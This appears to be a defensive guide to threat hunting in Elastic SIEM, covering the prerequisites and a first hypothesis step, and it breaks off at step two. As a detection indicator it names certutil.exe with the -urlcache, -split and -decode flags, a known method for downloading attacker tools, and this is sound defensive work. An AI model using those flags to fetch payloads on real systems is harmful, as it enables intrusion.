performing-threat-hunting-with-elastic-siem

# Performing Threat Hunting with Elastic SIEM ## When to Use Use this skill when: - SOC teams need to proactively search for threats not caught by existing detection rules - Threat intelligence reports describe new TTPs requiring validation against historical data - Red team exercises reveal detection gaps that need hunting query development - Periodic hunting cadence requires structured hypothesis-driven investigations **Do not use** for real-time alert triage — that belongs in the Elastic Security Alerts queue with automated detection rules. ## Prerequisites - Elastic Security 8.x+ with Security app enabled in Kibana - Data ingestion via Elastic Agent (Endpoint Security integration) or Beats (Winlogbeat, Filebeat, Packetbeat) - Data normalized to Elastic Common Schema (ECS) field mappings - User role with `kibana_security_solution` and `read` access to relevant indices - MITRE ATT&CK framework knowledge for hypothesis generation ## Workflow ### Step 1: Develop Hunting Hypothesis Start with a hypothesis based on threat intelligence, ATT&CK technique, or anomaly: **Example Hypothesis**: "Attackers are using living-off-the-land binaries (LOLBins) for execution, specifically certutil.exe for file downloads (T1105 — Ingress Tool Transfer)." Define scope: - **Data sources**: `logs-endpoint.events.process-*`, `logs-windows.sysmon_operational-*` - **Time range**: Last 30 days - **Expected indicators**: certutil.exe with `-urlcache`, `-split`, or `-decode` flags ### Step ...